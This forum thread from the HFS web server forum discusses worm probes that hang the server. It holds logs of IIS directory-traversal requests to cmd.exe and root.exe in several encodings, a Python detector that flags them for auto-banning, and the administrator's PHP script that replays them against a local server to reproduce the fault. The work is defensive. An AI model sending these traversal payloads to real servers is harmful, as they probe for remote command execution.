rejetto forum

Automatically ban worms?

Guest · 8 · 3017


Anonymous

  • Guest
Would be very nice if you could automatically ban IP addresses that send GET requests containing certain keywords.

Kind of like this:
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
GET /scripts/..Á../winnt/system32/cmd.exe?/c dir
GET /scripts/..À/../winnt/system32/cmd.exe?/c dir
GET /scripts/..À¯../winnt/system32/cmd.exe?/c dir
GET /scripts/..Áœ../winnt/system32/cmd.exe?/c dir

etc...


Anonymous

  • Guest
Second time this has happened today, but it seems that when I get these worm GET attempts, HFS will hang.

The menu button stops working completely, for instance :(


Anonymous

  • Guest
Quote from: "Anonymous"
Second time this has happened today, but it seems that when I get these worm GET attempts, HFS will hang.

The menu button stops working completely, for instance :(

Rejetto, this seems consistent for me, because HFS has hung all three times I've gotten these malformed GET requests.


Offline rejetto

  • Administrator
  • Tireless poster
    • Posts: 13510
I need a way to reproduce the problem.
Can you help me find such a tool?
Or, alternatively, the exact HTTP request.


Anonymous

  • Guest
Quote from: "rejetto"
I need a way to reproduce the problem.
Can you help me find such a tool?
Or, alternatively, the exact HTTP request.

Here's a log file:

On 3 occasions the same IP caused HFS to hang. When trying to click the Menu button, nothing would happen.

I added the IP as banned when it happened the first time, so I only saw ".... connected" after that, but still the server hung.

Code:
2004-09-21 11:17:41 213.114.30.46:2299 Connected
2004-09-21 11:17:41 213.114.30.46:2299 Requested GET /scripts/root.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2299 Request dump
> GET /scripts/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2301 Connected
2004-09-21 11:17:41 213.114.30.46:2301 Requested GET /MSADC/root.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2301 Request dump
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2313 Connected
2004-09-21 11:17:41 213.114.30.46:2313 Requested GET /c/winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2313 Request dump
> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2315 Connected
2004-09-21 11:17:41 213.114.30.46:2315 Requested GET /d/winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2315 Request dump
> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2320 Connected
2004-09-21 11:17:41 213.114.30.46:2320 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2320 Request dump
> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2326 Connected
2004-09-21 11:17:42 213.114.30.46:2326 Requested GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2326 Request dump
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2328 Connected
2004-09-21 11:17:42 213.114.30.46:2328 Requested GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2328 Request dump
> GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2331 Connected
2004-09-21 11:17:42 213.114.30.46:2331 Requested GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2331 Request dump
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2335 Connected
2004-09-21 11:17:42 213.114.30.46:2335 Requested GET /scripts/..Á../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2335 Request dump
> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2339 Connected
2004-09-21 11:17:42 213.114.30.46:2339 Requested GET /scripts/..À/../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2339 Request dump
> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2340 Connected
2004-09-21 11:17:42 213.114.30.46:2340 Requested GET /scripts/..À¯../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2340 Request dump
> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2343 Connected
2004-09-21 11:17:42 213.114.30.46:2343 Requested GET /scripts/..Áœ../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2343 Request dump
> GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2344 Connected
2004-09-21 11:17:43 213.114.30.46:2344 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2344 Request dump
> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2346 Connected
2004-09-21 11:17:43 213.114.30.46:2346 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2346 Request dump
> GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2353 Connected
2004-09-21 11:17:43 213.114.30.46:2353 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2353 Request dump
> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2360 Connected
2004-09-21 11:17:43 213.114.30.46:2360 Requested GET /scripts/..%2f../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2360 Request dump
> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
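Detection logic for the auto-ban idea from the first post, run over the HFS log format shown in the dump above. This is an added example, not HFS code or anything rejetto posted: it assumes the log layout seen in this thread (a timestamp and `ip:port` header line followed by `> GET ... HTTP/1.0` dump lines), uses constructed sample lines with documentation addresses, and the `classify`, `canonicalize`, `scan_log` and `ban_list` names are my own. The point it adds to the thread is that the keywords have to be matched after decoding: the same probe arrives as `%5c`, `%255c`, `%%35%63` and as the overlong UTF-8 `%c0%af` / `%c1%9c`, so the path is percent-decoded until stable and then read the way the lenient IIS decoder those worms targeted read it, before looking for `..` traversal or `cmd.exe`/`root.exe`.

```python
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import unquote_to_bytes

# What the worm probes in the thread have in common once decoded: they reach
# cmd.exe / root.exe or climb out of the web root with ".." segments.
SUSPICIOUS_TOKENS = ("cmd.exe", "root.exe")
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")

# HFS-style log lines (assumed format, copied from the dump in this thread).
HEADER = re.compile(r"^(?P<ts>\S+ \S+) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):\d+ .*$")
REQUEST = re.compile(r"^> (?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d$")


def percent_decode_fully(path: str, max_rounds: int = 3) -> bytes:
    """Percent-decode until stable so double encodings collapse: %255c -> %5c -> '\\'.
    The text is encoded as cp1252 so raw high bytes that HFS already decoded once
    (the 'Á' seen in the log) turn back into the bytes the worm actually sent."""
    data = path.encode("cp1252", errors="replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data


def lenient_utf8_to_text(data: bytes) -> str:
    """Read bytes the way the lenient IIS decoder the worm targeted did: a 0xC0/0xC1
    lead byte plus the following byte is an overlong 2-byte sequence (%c0%af -> '/',
    %c1%9c -> '\\'); every other byte is taken as one character."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def canonicalize(path: str) -> str:
    """Single normalized form of a request path, used for matching only."""
    text = lenient_utf8_to_text(percent_decode_fully(path))
    return text.replace("\\", "/").lower()


def classify(path: str) -> List[str]:
    """Reasons this path looks like one of the worm probes; empty list if clean."""
    canon = canonicalize(path)
    reasons = []
    if TRAVERSAL.search(canon.split("?", 1)[0]):
        reasons.append("directory traversal")
    reasons.extend(tok for tok in SUSPICIOUS_TOKENS if tok in canon)
    return reasons


def scan_log(lines) -> Dict[str, List[Tuple[str, str, List[str]]]]:
    """Pair each '> GET ...' dump line with the IP of the preceding header line.
    Returns ip -> [(timestamp, raw path, reasons)] for the requests that matched."""
    hits: Dict[str, List[Tuple[str, str, List[str]]]] = {}
    current = None
    for line in lines:
        h = HEADER.match(line)
        if h:
            current = (h["ts"], h["ip"])
            continue
        r = REQUEST.match(line)
        if r and current:
            reasons = classify(r["path"])
            if reasons:
                hits.setdefault(current[1], []).append((current[0], r["path"], reasons))
    return hits


def ban_list(hits: Dict[str, list], threshold: int = 1) -> Set[str]:
    """IPs with at least `threshold` matching requests; the first post asks for 1."""
    return {ip for ip, h in hits.items() if len(h) >= threshold}


# Constructed sample log in the HFS format above (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
2004-09-21 11:17:41 203.0.113.7:2299 Request dump
> GET /scripts/root.exe?/c+dir HTTP/1.0
> Host: www
2004-09-21 11:17:42 203.0.113.7:2320 Request dump
> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
2004-09-21 11:17:42 203.0.113.7:2340 Request dump
> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
2004-09-21 11:17:43 203.0.113.7:2344 Request dump
> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
2004-09-21 11:18:00 198.51.100.9:3001 Request dump
> GET /index.html HTTP/1.1
> Host: www
"""

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for ip, entries in found.items():
        for ts, raw, why in entries:
            print(f"{ts} {ip} {raw} -> {', '.join(why)}")
    print("ban:", sorted(ban_list(found)))
```

Run as-is it prints each matching request with the reason it matched and the resulting ban set. Only the raw `> GET` dump lines are inspected, not the `Requested` lines, because HFS has already decoded those once and that loses the distinction between the encodings; `threshold` can be raised above 1 if a single odd-looking request should not be enough to ban a client.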


Anonymous

  • Guest
Quote from: "rejetto"
I need a way to reproduce the problem.
Can you help me find such a tool?
Or, alternatively, the exact HTTP request.

The tool is probably a worm like "Code red" or something. I don't have that :)


Offline rejetto

  • Administrator
  • Tireless poster
    • Posts: 13510
I made this PHP script to test, but it was not able to hang my HFS :(
Code:
<?php
// Request paths copied from the log above, sent one at a time to a local HFS instance
$urls = array(
'/scripts/root.exe?/c+dir',
'/MSADC/root.exe?/c+dir',
'/c/winnt/system32/cmd.exe?/c+dir',
'/d/winnt/system32/cmd.exe?/c+dir',
'/scripts/..%255c../winnt/system32/cmd.exe?/c+dir',
'/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir',
'/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir',
'/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%252f../winnt/system32/cmd.exe?/c+dir',
);

foreach ($urls as $url) {
  // Open a plain TCP connection and send a minimal HTTP/1.0 request, one per connection
  $sock = fsockopen('localhost', 80) or die('cant open');
  fwrite($sock, "GET $url HTTP/1.0\r\nHost: www\r\nConnection: close\r\n\r\n");
  // Drain the response so the server sees a normal client, then close
  while (!feof($sock)) fread($sock, 4096);
  fclose($sock);
  echo '.';
}
?>


Anonymous

  • Guest
I'll report back with a full log if it happens again. (haven't run the server in a while now).

I had "let browse" on the root turned off when this happened (if that would be any kind of help).